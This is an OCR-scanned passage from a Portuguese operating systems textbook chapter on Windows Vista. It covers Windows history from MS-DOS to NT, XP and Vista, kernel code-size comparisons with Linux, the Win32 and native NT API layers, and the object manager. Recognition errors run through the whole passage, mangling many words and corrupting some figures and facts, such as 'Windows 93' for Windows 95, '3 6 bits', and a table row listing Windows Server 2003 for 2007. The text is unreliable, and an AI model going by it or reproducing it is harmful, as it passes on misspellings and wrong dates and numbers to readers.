temas de pesąuisa do Stanford Research Tnstiuue e da Xe- 
rox PARC, hem como de sous progenitores, o Apple Lisa 
e o Apple Macintosh, a Microsoft deddiu dar ao MS-DOS 
unia i mer face grafica com o usuario chamada Windows. 
As primeiras duas vcrsoes do Windows (lanęadas em 1985 
c 1987) uao fizeram muito sucesso, em parte por conta 
das llmitaęoes do hardware do PC dispomvcl na epoca. Em 
1990, a Microsoft lanęou o Windows 3.0 para o Intel 386 c, 
em seis meses, vendcu mais dc um mUhao dc copias, 

O Windows 3.0 uao era bem um sistema operacional, 
mas um ambieme grafico construido sobrc o MS-DOS, que 
ainda controlava a maąuina c o sistema de arquivos* Todos 
os programas funcionavam no mesmo espaęo de endere- 
ęamento, e um erro em urn dclcs poderia la zer o sistema 
inteiro pa ran 

Em agosto de 1995, foi lanęado o Windows 95, que 
continha muitas das caracterisiicas de um sistema opera¬ 
cional maduro, inclusive memória virtual, gercncianiemo 
de proceśsos e multiprogramaęao, e que incluia imerfaces 
de programaęao de 32 bits, Entreianlo, ele ainda nao era 
totalmcnte seguro e o isolamento entre as aplicaęóes e o 
sistema operacional era precario. Os problemas dc insta- 
bilidadc com i nu a ram mesmo nas vcrsocs subseąucntes — 
Windows 98 e Windows Me—, cm que o MS-DOS eon- 
tinuava a exccmar código assembly dc 16 bits no coraęao 
do sistema operacional Windows. 

_ 11.1.31 Decada de 2000: o Windows 

baseado em NT 

No fmal dosanos 1980, a Microsoft perce be u que cons- 
truir um sistema operacional moderno sobre o MS-DOS 
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nao seria o melhor caminho. O hardware do PC conti- 
nuava a melhorar sua velocidade e sua capaeidade, e sen 
mercado acabaria colidindo com os mercados de estaę&es 
de trabalho e servidores empresariais, nos quais o UN1X 
era o sistema operacional dominantę. A Microsoft tambem 
cstava prcocupada com a possibilidadc dc a familia dc pro- 
cessadorcs Intel ddxar de ser competitiva, ja que da cstava 
sen do amcaęada pelas arquiteturas RISC. Para lidar com 
essas questoes, a Microsoft contratou urn grupo de enge- 
nheiros da DEC, liderado por David Cutier, um dos princi- 
pais projeiistas do sistema operacional VMS da DEC. Cutier 
deveria produzir, a parli r do zero, um novfssimo sistema 
operacional de 32 bits que deveria iniplementar o OS/2, 
a AP1 do sistema operacional que, na epoca, a Microsoft 
deseńvolvera em conjunto com a IBM. Os documentos ori- 
gmais do projeto desenvolvido pela equipe de Cutier foram 
chamados dc sistema NT OS/2. 

Cha mado de NT, acrónimo de New Technology (nova 
lecnoiogia) e tambem porąue o proeessador-alvo original 
era o novo Intel 860 (codinome N10), o sistema de Cutier era 
destinado a funcionar em diferemes processadores e enfa- 
tizava a seguranęa e a confianęa, bem como a comparibi- 
1 kładę com as vcrsoes Windows baseadas no MS-DOS. A 
cxpericnda dc Cutier com o VMS aparece daramente cm 
varias part es, havendo mais do que urna simplcs similari- 
dadc entre o projeto do NT e o do VM$, eon formę ni ostra 
a Tabela 11.2. 

Ouando os engenheiros da DEC (e, mais tarde, seus 
advogados) viram o quanto o NT era pareddo com o VMS 
(c tambem com seu sucessor nunca lanęado, M1CA), inicia- 
lizou-sc u ma discussao a respeito do uso pela Microsoft do 
que era propriedade intelectual da DEC, A discussao nao 
cii ego u aos tiibunais e a Microsoft concordou em dar su- 
porte ao NT no DEC Alpha dumnie algum tempo. Contu- 
do, nada disso foi suficiente para evitar que a DEC ficasse 
li mi ta da aos minicomputadores e desdenhasse dos comp li¬ 
ta do r es pessoais. Sua postura foi ratificada pela fala de seu 
fundador, Ken Olsen, em 1977: "Nao ha razao para alguem 
ąuerer um computador em casa*. Em 1998, o que sobrou 


Ano 

Sistema 

operacional 

DEC 

Caraotoristioas 

1973 

RSX-11M 

16 bits, mult i usuario, tempo real, 
troca {swapping) 

1978 

VAX/VMS 

32 bits, memória virtual 

1987 

VAXELAN 

Tempo rea! 

1988 

PRISM/MICA 

Cancelado em funęao do MIPS/ 

Ultrix 


I Tabela 11*2 O sistema operacional DEC desenvdvido por 
David Cutier. 
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da DEC foi vendido para a Compaq, que mais tarde a ca bo u 
comprada pela Hewlett-Packard. 

Os programadorcs familiarizados apenas com o UNIX 
acham a arąuitettira do NT basta mc difercnte nao somente 
pda influcncia do VMS, mas lambem pelas diferenęas nos 
sistemas computacionais comuns na cpoca do pro]eto. A 
primcira ver$ao do UN1X surgiii cm 1970. Era um sistc- 
ma de 16 bits para um unico processador, com urna me- 
mória minima, sistemas de troca nos quais o processo era 
a unidade de concorrencia e composięao e no qual fork/ 
cxcc nao crani operaęoes ca ras (ja quc os sistemas dc iroca 
sempre copiam os proccssos para o disco), O NT foi projc- 
tado no inicio da dccada dc 1990 r ąnando cram comuns 
os sistemas de 32 bits para imiliiproeessadores capazes dc 
Si dar eona muuos bytes c memoria virtual. No NT, threads 
sao a unidade de concorrencia, bibliotccas dinamicas sao as 
unidades de composięao e fork/ex@e sao impkmentados pos¬ 
il ma dni ca operaęao para criar um novo processo £ execu- 
lar outro programa sem que se faęa unia cópia primeiro. 

A primcira versao do Windows baseado cm NT (Win¬ 
dows NT 3.1) foi lanęada cm 1993. Essc mimem inicial da 
versao foi escolhido para compatibiliza-io com o mi mero 
da versao do siSterna dc 16 bits mais popular da Micro¬ 
soft, o Windows 3 J. O projeto com a IBM nao teve sticesso 
e, embora as interfaces do OS/2 ainda fossem suportadas, 
as primdras imerfaccs crani cxtensoes 32 bits das APIs do 
Windows, denominadas Win32. Entre o inicio c o primeiro 
lanęamento do NT, lanęou-se o Windows 3.0 — quc foi 
extremamenle hem-sucedido comerdalmente. Ele lam¬ 
bem conseguia exmnar programas Win32, mas sonie me 
por rneio de uma bibkoteca de compatibilidade. 

Assim como a primcira versao do MS-DOS bascada no 
Windows, a vcrsao do Windows bascada cm NT nao obtcvc 
sticesso imediato. O NT demandava mais mcmorla, cxis- 
liam poucas aplicaęoes 32 bits dispomveis, e as incompati- 
bilidades entre os drivers de dispositivos e as aplicaęoes fez 
com que muitos usuarios conliniiassem utiiizando o Win¬ 
dows baseado no MS-DOS — que a Microsoft ainda estava 
niclhorando e que levou ao lanęamento do Windows 93, 
cm 1995. Como o NT, o Windows 95 ofcrecia intcrfaces dc 
programaęao 32 bits nativas, mas com melhor eoinpatibilT 
dade entre os programas c as aplicaęocs 3 6 bits existemes. 
Nao e surpresa alguma o lato dc que o sticesso inicial do NT 


tenha se dado no mercado de servidores, no qual compeiia 
com o VMS e o NetWare. 

O NT alcanęou suas metas dc portabilidade, c os lan- 
ęamentos de 1994 c 1995 acrescentaram su porte para as 
arąuiteturas MIPS {littk-mdnin — extrcmidade menor pri- 
meiro) e PowerPC. A primcira auializaęao hnportame no 
NT veio em 1996, com a chegada do Windows NT 4.0. 
Esse sistenia apresentava o poder, a seguranęa e a confiabi- 
lidade do NT, mas tambein dava suporte a mesma interface 
com o usuario do emao popular Windows 95. 

A Figura 11.1 mostra a relaęao entre a A PI do Win32 e 
o Windows. Para o sucesso do NT era crucial que existisse 
uma A FI comum tanto nas versoe$ do Windows baseadas 
no MS-DOS quamo naquelas baseadas em NT. 

Essa compatibilidade fadlitou a migraęao de usua-rios 
de Windows 95 para o NT e o sistenia operacional trans- 
formou-se cm um forte participante, tanto no mercado de 
desktops ąuanto no dc semdores. Entretanto, os consumi- 
dores nao estavam tao dispostos a adotar novas arąuitem- 
ras e, das qtiatro arąuiteturas suportadas pelo Windows NT 
4,0 em 1996 (o DEC Alpha foi indufdo nessa distnbuięao), 
somente a xS6 (on seja, a familia Pentium) continuava ati- 
yamente suportada quando do lanęamento da versao se- 
guinte, denominada Windows 2000. 

O Windows 2000 represeota uma significativa evoluęao 
no NT. As prinripais tecnologias indnfdas foram a ca racteris- 
tica phąj-iind-play (para os consmnidores que instalavam no- 
vas placas PCI, eliminava-sc a necessidade de preocupaęao 
com jumpm), os servięos de diretório de rede (para clientes 
empresariais), a melbom no gerendamentode energia (para 
os notebooks) e unia melhor GUI (para todos). 

O sucesso tecnico do Windows 2000 levou a Microsoft 
a acelerar a depreciaęao do Windows 98, por rneio da me¬ 
lb ora na compatibilidade entre aplicaęoes e dispositivos nas 
distribuięoes seguintes do NT, denominada Windows XP. 
Este inclufa uma interface grafica mais agradavel e amiga- 
vel, que reforęaya a estrategia da Microsoft de atrair con- 
sumidores e colher os frutos a medida que esses consumi- 
dores pressionavam sens em pręga dores a a do tar sistemas 
com os quais des ja estavam familiatizados, A estrategia 
foi extremamente bem-sucedida e o Windows XP acabou 
i usta lado cm cenienas de milhdes de PCs no mundo todo 
ao longo de scus primeiros anos, o que permitiu que a 



| Figura 11.1 


A API do Win32 permite que os program as sajam e^ecutados em quase todas as versoes do Windows. 
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Microsoft alcanęasse sua meta de efetivameme pór fim a 
era do Windows baseado em MS-DOS. 

0 Windows XP rcprcscntava urna nova rcalidadc dc 
deseńvolvimenlo para a Microsoft, que separa os lanęa- 
memos para ciiemes desktop e servidores empresariais. 0 
sistema era muiifssńno complexo e nao permitia agmpar 
em unia mesma distribuięao de aha qualidade dois per- 
fis tao distintos. A versao para semdores foi denomina- 
da Windows 2003 e complenientava a versao do XP para 
clientes. Ela oferecia suporte ao Itanium 64 bits da Intel 
<IA64) c, no seu primeiro pacote de servięos, lambem para 
a arquitetura AMD x64, tanio cm deskiops quamo cm ser- 
vidores. A Microsoft iitilizou o tempo cmrc as distribui- 
ęoes clicnlc c scrvidor para induir caraaeristicas espeafi- 
cas para senidores c realizm tcslcs extert50s vollados aos 
aspectos dos sistemas usados imcialmeme nos negócios. A 
Tabela 11.3 apresema a relaęao emre as caractensticas das 
distribuięóes do Windows para diemes e semdores. 

A Microsoft acompanliou o sucesso do Windows XP e 
embarcou no deseń volvimento de u nr lanęamento podero- 
so, que causou cxcitaęao entre os consnmidores donos dc 
PCs, O resukado, deiiominado Windows Vista, foi eon- 
clufdo em 2006, mais de cinco a nos depois do lanęamento 
do XP. O Windows Vista trouxe outra inovaqao no pro jęto 
de interface gra fi ca e novas caractensticas de seguranęa, 
mas a maioria das mudanęas rdarionava-se as experiendas 
visfveis do usnario e as capacidades. A tecnologia em se- 
gundo piano aumentava gradativamente f com muita lim- 
peza no código e me I hora s em desempenho, e scala bili da dc 
c confiabilidadc. A versao para semdores do Vista {Win¬ 
dows Scrver 2008) foi lanęada ccrca de urn ano depois da 
yersao para consumidores, Elas compartilham dos mesmos 
componcntes principais do sisiema, como ml cl co, drivers, 
bibliotecas de baixo mvel e programas com o Vista. 

A historia hu mana por tras do desenvolvimento inicial 
do NT e relatada no łivro Showswppcr (Zacchary, 1994) e 
fala bastante sobre os principais cnvo!vidos e as difieulda- 
des dc lcvar adiante nm projeto dc software tao ainbicioso. 

11-1.4 f Windows Vista 

A distribuięao do Windows Vista marcou o encerra- 
mento da primeira fasę do projeto de sistema operacional 
mais extenso ja visio, Os planos iniciais eram tao ambicio- 


Ano 

Versao dlente 

Ano 

Versao servidor 

1996 

Windows NT 

1996 

Windows NT Server 

1999 

Windows 2000 

1999 

Windows 2000 Server 

2001 

Windows XP 

2003 

Windows Server 2003 

2006 

Windows Vista 

2007 

Windows Server 2003 


| Ta be la 1 1 .3 Versdes cl iente e semdor do w indo ws 
I separadas. 
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sos que, poucos anos depois do imcio do desenvolvinren- 
lo, o Vista precisou ser reinicializado com um escopo me- 
nor. Os planos de basear-sc na linguagem C# .NET [oram 
arquivados, assim como a idcia de implementar algumas 
caractensticas iniportantes — como o sistema unifieado dc 
busca e organizaęao dc dados dc font es distintas do Win- 
FS. O lamanbo do sistema operacional inteiro surprccn- 
de. A distribuięao original do NT tinha tres milhoes dc 
linhas de código em C/C++ e creseeu para 16 milhoes no 
NT 4, 30 milhóes no Windows 2000, 50 milhoes no XP e 
mais de 70 milhoes no Vista. 

M uito desse ta ma n ho sc deve a en faso da M icrosoft 
cm inclnir novos recursos a cada nova distribuięao. No di- 
retório prineipal $y$tem32, esistem 1.600 bibliotecas dina- 
mi cas {DLLsj e 400 executaveis (EXEs), e esse nu mero nao 
indu i os outros diretórios rep] etos dos applets incluidos 
no sistema operacional e que per mitem que os usuarios 
acessenr a Internet, ouęam musicas c assistam a videos, 
eiwiem e-mails, varram documcntos, organiżem fotos e 
ale mesino cricm sens próprios fil mes, Como a Microsoft 
quer que os usuarios migrem para as novas versoes, ela 
mantem a compatibilidade por me i o da manntenęao de to- 
das as caractensticas, APls, applets fpequenas apbcaęóes) 
etc., da versao anicrior. Po u cas coisas sao exchudas. O rc- 
sultado c quc o Windows crcscc drasticamentc a cada nova 
distribuięao. A tecnologia acompanha esse ritmo, e a mfdia 
para distribuięao do sistema ja passou por disąuete, CD e, 
com o Vista, DVD. 

O aumenlo no nu mero de recursos e applets no topo 
do Windows difiaiha a comparaęao com outros sistema s 
operacionais em termos de tamanho, poisć dificil decidir o 
que faz ou nao parte do sistema operacional. Nas camadas 
mais baixas, existe maior correspondcncia por eon ta da se- 
melhanęa nas funęóes executadas. Ainda assim, e possivel 
pereeber uma grandę difercnęa no tamanho do Windows, 
A Tabela 11.4 eonipara os nucleos do Windows c do Linux 
para tres areas funcionais: o escalonador da CPU, a infraes- 
trutura de E/S e a memória vimial. Todos os componcntes 
sao maiores no Windows, mas a memória virmal e mui- 
tissimo maior — dcvido ao grandę n u mero de recursos, 
ao modelo utilizado e as tecnicas de implememaęao que 
abriram mao do tamanho do código em funęao de um me- 
llior deseni pen ho. 


Areas do nucie o 

Limix 

Windows 

Escalonador da CPU 

50.000 

75.000 

infraesbutura de E/S 

45.000 

60,000 

Memória virtual 

25.000 

175.000 


Tabela 11.4 Comparaęao do nclmero de linhas de código 
para alguns módulos do modo nucteo no I2nux e no Windows 
(por Mark Russinoyich, autor de Microsoft Windows Intermfs). 
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11.2 


Programando o Windows 
Vista 


Agora e a hora de comeęar nosso e stu do tecnico do 
Windows Vista. Comudo, antes de emrar em deialhes da es- 
trutura interna, primeiro estudaremos a API nativa do NT 
para chamadas de sistema e, em seguida, o subsistema de 
programaęao Win32. Apesar da disponibilidade do PQSIX, 
qnase todo o código cscrito no Windows usa Win32 direta- 
mentc ou .MET — que r em si, funciona no topo do Win32. 

A Figura 11.2 mostra as camadas do sistema operacio- 
nal Windows. Abaixo das camadas de appiets e da GUI estao 
as interfaces de programaęao sobre as quais as aplicaęoes sao 
constmfdas. Como na maioria dos sistemas operacionais, 
as camadas sao formadas por biblioiecas de código (DLLs), 
com as quais os pr ogra mas se conedam dinamicamente 
para accssar os recursos do sistema operacional. O Windows 
tambem indui um eonjimto dc interfaces dc programa¬ 
ęao quc sao implementadas como scrvięos que funcionam 
como processos separados* As aplicaęoes sc comunicam 
com senięos no modo usuario por ni do dc chamadas dc 
procedimeruo remoto {remote-procedure calk — RPCs). 

O nucleo do sistema operacional NT c o programa de 
modo nucleo NTOS {ntoskrnl.exe), que oferece a tradicio- 
nal interface de chamadas de sistema sobre a qual todo o 
restante do sistema operacional e montado. No Windows, 
s omen te os programadores da Microsoft cscrevcm para a 
camada dc chamadas dc sistema. Todas as imerfaces de 
modo usuario publicadas pertencein a personalidades do 
sistema operacional que sao implementadas ulitizando 
subsistemas que funcionam no topo das camadas NTOS. 

Originalmcnte, o NT dava suporte a tres personalida¬ 
des: 05/2, POSiX c Win32. O OS/2 foi dcscartado no Win¬ 
dows XP. O P0S1X tambem foi rcmovido, mas os clicntcs 
podem conseguir um subsistema PO$fX mdhorado, deno- 
ininado hitem, como parte dos servięos para UNiX {semces 
for Umx — SFO) da Microsoft e, assim, toda a infra estru tura 
de suporte ao POSIX perinanece no sistema. A maioria das 


aplicaęoes Windows esta escriia para usar Win32, mas a 
Microsoft tambem da suporte a outras APIs. 

Ao contrario do Win32, .NET nao esta montado como 
um subsistema oficial nas interfaces de nucleo nativas do 
NT. Em vcz disso, *NET c montado no topo do rnoddo de 
programaęao Win32, o que pertnite que ele interopere bem 
com os programas Win32 existemes — algo que nunca foi 
a meta com os subsistemas P0S1X e OS/2. A API WinFX 
indui imiitas das caracteristicas do Win32 e, na vmlade, 
muitas das funęoes na biblioteca de dasse bose do WinFX sao 
simplesmente invólucros para as APIs Win32. A vantagem 
do WinFX esta relacionada a riqueza dos tipos de objetos 
suportados, as interfaces consistentcs simplificadas e a apli- 
eaęao do tempo de execuęao da linguagem comum {com- 
mon Itmguage run-time —- CLR), que indui a coleta dc lixo r 

Conforme mostra a Figura i 1.3, os subsistemas NT sao 
montadosa parltr de ąuatro componemes: um processo do 
subsistema, um eonjimto de biblioiecas, ganchos no Crea- 
teProcess e suporte no nucleo, Um processo do subsistema 
e simplesmente um servięo. A unica propriedade especial 
e que ele e inidalizado pelo programa smss.exe (gerenda- 
dor dc sessócs) —-o programa inidal do modo usuario ini- 
cializado pelo NT — como resposta a uma solicitaęao de 
CreatePrccess no Win32 ou da API correspondente em um 
subsistema distinto. 

O conjumo de bibliotecas implementa as funęoes de 
alt o mvd do sistema operacional especfficas do subsistema 
e contem as rotinas de stubs, que se comunicam enire os 
processos utilizando o subsistema (mostrado a esquerda) e 
o processo do subsistema em si (mostrado a direita). As cha¬ 
madas ao processo do subsistema norma i menie acontecem 
no modo nucleo utilizando as fa ci li da des da LPC [kcal pro¬ 
cedurę cni! — chama da de procedimenlo focal), que im- 
piementam chamadas dc procedimento entre os processos. 

O ganclio na chamada CreateProceso do Win32 detecta 
o subsistema nccessario a cada programa por meio dc uma 
consulla a imagem binaria. Feito isso, de solicita ao arqui- 
vo smss.exe que inicialize o processo do subsistema csrss. 



Appiets (pequenos Win32 executaveis) 


Sen/ięos NT: 
smss, Isass. 
servigos ? winlogon 

GUI (shetl32.dll, user32.dll, gdi32.dll) 

Bibliotecas dinamicas (ole32.dll, rpc.dll) 

Processo do subsistema 
(csrss) 

Subsistema API (kernel32.dll. advapi32l.dll) 

Modo usuario 

API nativa do NT, tempo de execuęao C/C++ (ntdll.dll) 


Modo nucleo 

Camada de nucleo NTOS (ntoskml.exe) 

Drivers: dispositlvos, 
sistema de arqutvos, 
rede 

Camada executiva NTOS (ntoskrnLexe) 

Driver GUI 
(Win32k.sys} 

Camada de abstraęao de hardware (hal.dll) 


| Figura 11.2 As camadas de programaęao no Windows. 
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i Figura 11.3 Os cornponentes utilizados namontagem dos subsistemas NT, 


exe {caso de a i uda nao esteja cm execuęao)> 0 processo do 
subsistenia assume, en u o, a responsabilidade pelo carrega - 
niemo do pr ogra ma. A implementaęao de outros subsisie- 
mas possui um gancho semelhante (por exemplo, como na 
cha mad a de sistema exec do POSIX). 

O niicleo do NT foi pi oj da do de modo a ofcrcccr di- 
versas fadlidadcs que podeni ser utiliżadas na criaęao dc 
subsistemas espcaTicos do sistema operacional. Exi$ie tam- 
bem código especial que deve ser inserido para que a itn- 
pkmentaęao de cada subsistema acomeęa de forma corre- 
ta. Como exemplos, podemos citar a chamada de sistema 
nativa NtCreateProcess, que implemenla a duplicaęao de 
processos como suporte a chamada fork do POSIX, e a im- 
plementaęao do nucleo de que sao um tipo particular de 
tabela de cadeia de caracteres para o Win32 (deiiominadas 
dtomos), ąuc. permitcm o compartilliamcnto eficicntc cmre 
os processos de cadda de caracteres somente para leitura. 

Os processos do subsisiema sao programas NT nativos 
que fazem uso das ehamadas de sistema nativas do NT dis- 
ponibilizadas pelo nucleo e pelos servięos principais, como o 
smss.exe e o lsass.exe (para administracji o local da seguranęa). 
As ehamadas de sistema naiivas incluem farilidades de gc- 
rcnciamcnto dc cndercęos virtuais, threads, manipuladorcs 
c cxccęóes nos processos criados para cxecutar programas 
escritos dc forma a utilizar um subsisiema em partiatlar, 

11-2-11 A interface de programaęio nativa 
de aplicacoes do NI 

Como em todos os outros sistemas operacionais, o 
Windows Vista pode execuiar um conjunto de ehamadas 
de sistema, que sao implementadas na camatla de execuęao 
NTOS do modo niicleo. A Microsoft publicou poucos deta- 
lhes dessas ehamadas nativas. Elas sao usadas imemamen- 
te por programas de baixo nwel que acompanham o pacote 
do sistema operacional (a maior parte scrWęos e subsiste- 


mas), bem como dnvers dc dispositivos do modo nucleo, 
Apesar dc nao haver muitas mudanęas nessas ehamadas de 
sistema a cada lanęamemo, a Microsoft preferiu nao torna- 
-las publicas, de modo que as apllcaęoes deseńvolvidas para 
o Windows fossem baseadas no Win32, aumentando, dessa 
forma, a probabilidade de funcionamento em sistemas ba- 
seados tamo em MS-DOS como no NT, unia vez quc a AP1 
do Win 32 e comum a a mb os. 

A maioria das ehamadas de sistema nativas do ES 7 ! ope¬ 
ra em objetos dc um lipo ou oulro do modo nucleo, in¬ 
du i udo arquivos, processos, threads, pipes, semaforos etc. 
A Tabela 11.5 apresenta urna lisia dc algumas das catego- 
rias comuns dos objetos do modo nucleo que tern suporte 
do NT no Windows Vista. Mais adiantc, quando tiiscuiir- 
mos o gerenciador de objetos, apresemaremos mais deta- 
llies de tipos especificos de objetos. 

Algumas vczcs o uso do termo objęto, rcfcrindo-sc a 
estru tu ras de da dos manipuladas pelo sistema operacional 
pode ser confundido com orkntaęao a objetos. Os objelos do 
sistema operacional dc łato apresentam ocultaęao dedados 
e abstraęao, mas carecem de algumas das mais basicas pro- 


Categoria de 
objęto 

Exemplos 

Sincronizaęao 

Semśforos, imiłexes a eventos, poiłaś de 

IPC, lilas de conclusao de E/S 

E/S 

Arquivos, dispositivos, driver$, 
temporizadores 

Programa 

Tarefas, processos, threads, segoes, tokens 

GUI do Win32 

Area de trabaiho, retorno (caitback) de 
aplicaęoes 


I Tabela 11.5 Categorias connuns de tipos de objetos do 
modo nucleo. 
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priedades de sistemas oriemados a objetos — como heran- 
ęa e polimorfismo. 

Na APJ nativa do NT ha chamadas disponfveis para 
criar novos objetos no modo nutko ou accssar os existen- 
tes. Gada cha mada, criando ou abrindo um objęto, retoma 
urn resuhado conheddo como um manipulador, quc i 
espedfico para o proccsso que o crion e pode, depois, ser 
usado em operaęócs no objęto. Dc modo geral, os manipu- 
ladores nao podeni ser passados de forma dii eta para ou- 
tro processo nem usados como referenda para o mesmo 
objęto. Entreianto, sob algumas ciramstancias, e possfvel 
dupllcar um manipulador em urna tabela de descritores de 
outros processos de urna forma protegida, permitindo aos 
processos compartilhar o acesso a objetos — mesmo que os 
objetos nao estejam acessfveis no espaęo de nomes. O pro- 
cesso que duplica um manipulador deve ter, de mesmo, 
descritores para os processos de origem e destino. 

Todo objęto tern um descritor de seguranęa asso- 
ciado a cle, detal bando quem pode ou nao exccutar quais 
lipos de operaędes no objęto baseado no acesso solidtado. 
Quando os manipuladores sao duplicados enlrc processos, 
novas restrięoes de acesso podem ser adicionadas, espeeffi- 
cas ao manipulador resuliame da duplieaęao. Dessa forma, 
um processo pode duplicar um manipulador de leitura e 
eserita e transforma-lo em urna versao de somenie leitura 
no pro cesso de destino. 

Nem todas as estruuiras de dados criadas pelo sistema 
sao objetos c nem todos os objetos sao do modo nudco. Os 
tinicos objetos quc sao dc fato do modo nudco sao aąueles 
que predsam ser noineados, pro tęgi d os ou compartilhados 
dc algunia forma. Elcs representam, dc maneira usual, ab 
gum tipo de abstraęao de programami o implementada no 
nucleo e todos sao de um lipo definido pelo sistema, contem 
operaęocs bem definidas c ocupam armazena niemo na mc- 
mona do nucleo. Ainda que os programas do modo usuario 
possani executar as operaędes (por meio das chamadas de 
sistema), elcs nao podem accssar os dados de modo direto. 

A Tabela 1 1.6 mostra unia seleęao de APJs nativas, que 
uti lizani os manipulador es para ma nipu lar os objetos do 


modo mielca, como processos, ibreads, portas de IRC e se- 
ędes (usadas para descrever os objetos de memória que po¬ 
dem ser map ea dos em espaęos de en dereęaniemo). A chama - 
da NtCreateProcess retoma um manipulador para um objęto 
de proccsso novo, representando urna instancia em execu- 
ęao do próg rama expressa pela Section Handle, A cha mada 
DebugPortHandle e usada na comunicaęao com um depura- 
dor quando e dado controle do processo após u ma exceęao 
(por cxemplo, divisao por zero ou acesso dc memória im a- 
lidoj. A cha ma da ExceptPortHandle e usada na comunicaęao 
com processos de subsistemas quando ocorrem erros e es¬ 
ic s nao sao tratados por um depurador próprio. 

A chamada NtCreateThnead usa o ProcHandle porąuc de 
pode criar um thread cm qualquer proccsso para o qual o 
processo de origem ten ha um descritor {com direitos de 
acesso suficicntes}. Dc forma silili lar, NtA31ocateVIrtualMemory, 
NtMapViewOfSection, NtReacMrtual Memory e NtWriteVirtua!Mennory 
perm! te ni a um processo operar nao somente em sen es- 
paęo de endereęamemo, mas alocar endereęos virtuais, se- 
ęoes dc mapcamcnto c ler ou gravar cm memória virtual 
de outros processos. NtCreateFile ć a chamada AP3 naiśva 
para criar novos arquivos ou abrir um existente. NlDuplicate- 
Objęci e a chamada A PI para duplieaęao de descritores de 
um proccsso para o outro. 

Os objetos do modo nucleo nao sao, Jogicamcmc; cs- 
peciTicos para o Windows. Os sistemas UNIX tam bem dao 
suporte a unia variedade de objetos do modo nucleo, como 
arquivos, soąuetes de rede, pip es, disposiiivos, processos e 
facilidades de comunicaęao entre processos (IPC — Inter- 
Proccss Commmńmmi), como memória compartilhada, 
portas de mensagem, semaforos c dispositivos dc E/S. No 
UNIX ha unia serie dc manciras dc nomcar c accssar obje¬ 
tos, como descritores dc arquivos, idenlificaęao dc proces¬ 
sos, idemifkaęao de ntimeros inteiros para objetos de IPC 
do Sistema V e i-nodes para dispositivo$. A huplemcntaęao 
de cada classe de objetos do UNJX e especifica, Arquivos e 
soquetes usam facilidades diferemes das usadas nos meca- 
nismos dc IPC do Sistema V r processos ou dispositivos. 


NtCreatGProc6S$(&ProcHandl9 p Acesso, SectionHandEe, DebugPortHandte, ExceptPortHand!e. „.) 
NtCreateThreadj^ThreadHandle, Proc Handle, Acesso, ThreadContext, GreateSuspended,...) 
NtAJIocateVirtualMemory(ProcHandle, Addr, Tatnanho, Tipo, Proteęao,...) 
NtMapVEewOfSection(SectHandle, ProcHandfe, Addr, Tamanho, Proteęao, 

NtReadVirtual Memory [Proc Handle, Addr, Tamanho, ...) 

NtWriteVirtualMemory{ProcHandle, Addr Tamanho, ..*) 

ŃtCreatefile^FiEeHandle, FiteNameDescriptor, Acesso,...) 

NtDuplicateObject(srcPnocHandle, srcObjHandie, dstProcHandie, dstObjHandle, 


j Tabela 11.6 Exemplos de chamadas API nafivas do NT que usam manipuladores na manipulaę^o dos objetos para al£m dos 
Mmites do processo. 
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Os objetos do nucleo no Windows milizam urna fa- 
rilidade uniforme, baseada em manipuladores e nomes 
no espaęo de nomes do NT, para referenciar outros deles, 
com u ma implemcmaęao uoificada em urn gerendador 
dc objetos centralizado. Os manipuladores sao espedfkos 
de ca da proeesso, mas, como desmto ameriormerue, po- 
dem ser duplicados para outros processos. O gerendador 
dc objetos permite quc clcs sejam nomeados no a to dc sua 
criaęao e, depois, acessados pelo nome para conseguircm 
manipuladores para os objetos. 

O gerendador de objetos usa Unicode (caracteres L 011 - 
gos) para representar os nomes no espaęo de nomes do 
NT. Ao comrario do UNDC o NT nao eostuma distinguir 
enire letras maiusculas e minusaiias (de mantem os ca¬ 
racteres, mas nao os distingue). 0 espaęo de nomes do NT 
e unia coleęao hicrarąuica, estruturada em arvorc, dc dirc- 
tódos, ligaęócs simbólicas c objetos. 

O gerendador de objetos tambem propordona faciii- 
dades unificadas para sincronizaęao, seguranęa e geren- 
riamenio de vida lilii dos objetos. Quem decide se as fa- 
dlidades gerais oferecidas pelo gerendador de objetos sao 
cii sponi bil i za da s para os usuarios de um objęto em particu- 
lar sao os componenies de execuęao, ja que elcs fornecem 
as APIs naiivas que manipulam cada lipo dc objęto. 

Nao sao apenas as apiicaęóes que usam objetos geren- 
ciados pelo gerendador de objetos. O próprio sistema ope- 
rarional tambem pode criar e usar objetos — e o faz de 
forma intensa. A maior parte desses objetos e criada com 
o objetivo de permitir que um coiiiponcnte do sistema ar- 
mazene alguma informaęao por um pen odo substanrial de 
tempo ou para passa r alguma estru tura de dados a outro 
componente e ainda se beneficiar da nomeaęao e su porte 
de vida lilii do gerendador de objetos. Por exemplo, quali¬ 
do uin dispositWo e deseobcrio, um ou mais objetos de 
dispositivos sao criados para representa-lo e descrever 
de forma lógica como de se conecta com o resfo do siste¬ 
ma, Para eon i rola r o disposilivo, um driver de dispositivo e 
carregado e um objęto de driver e eriado comendo suas 
propriedades e provendo os ponteiros para as funęóes que 
de implementa para processar as sołicitąęóes de E/S, Den- 
tro do sistema opera cional a referenda ao driver e feita 
usando scu objęto. O drivcr tambem pode ser acessado dc 
forma direta pelo nome em vez dc o ser de forma mdireta 
pclos dispositivos que cle comrola (por exemplo, na com 
figuraęao de parametros responsavds por sua opcraęao a 
partir do modo usuario). 

Diferememente do UNIX, quc coloca a raiz de scu es¬ 
paęo de nomes no sistema de arquivos, a raiz do espaęo de 
nomes do NT e mantida na me mona virtual do nucleo. Isso 
signifiea que o NT deve recriar seu espaęo de nomes dc nfvd 
alto toda vez que o sistema e iniriaiizado. A utilizaęao da 
memória vinual do nucleo permite ao NT armazenar infor¬ 
maęao no espaęo de nomes sern antes ter de imrializar o sis¬ 
tema de arquivos cm execuęao c toina muilo mais facil para 
o NT adicionar novos tipos dc objetos de modo nucleo a o 
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sistema porque os próprios formatos do sistema de arquivos 
nao predsam ser modificados para cada novo lipo de objęto. 

Um objęto nomcado pode ser marca do como perma- 
nente , significando que cle continua existindo ate que seja 
apagado de forma explfdta ou que o sistema reinieialize, 
mesmo que nenluim proeesso tenha um descritor para ele. 
Esses objetos podem ate estender o espaęo de nomes do 
NT. oferecendo rot i nas de analise que permitam a os objetos 
fundonar de forma semelhante aos pontos de montagem 
do UNIX. Os sistemas de arquivos e o registro usam essa 
fadlidade para niontar volumes e colmeias no espaęo de 
nomes do NT. Acessar o objęto de dispositWo por um volu- 
mc da accsso ao volumc bruto, mas o objeto de dispositivo 
tambem representa urna montagem implirita do volume 
no espaęo de nomes do NT Os arquivos individuai$ em um 
volume podem ser acessados concatenando-se sens nomes 
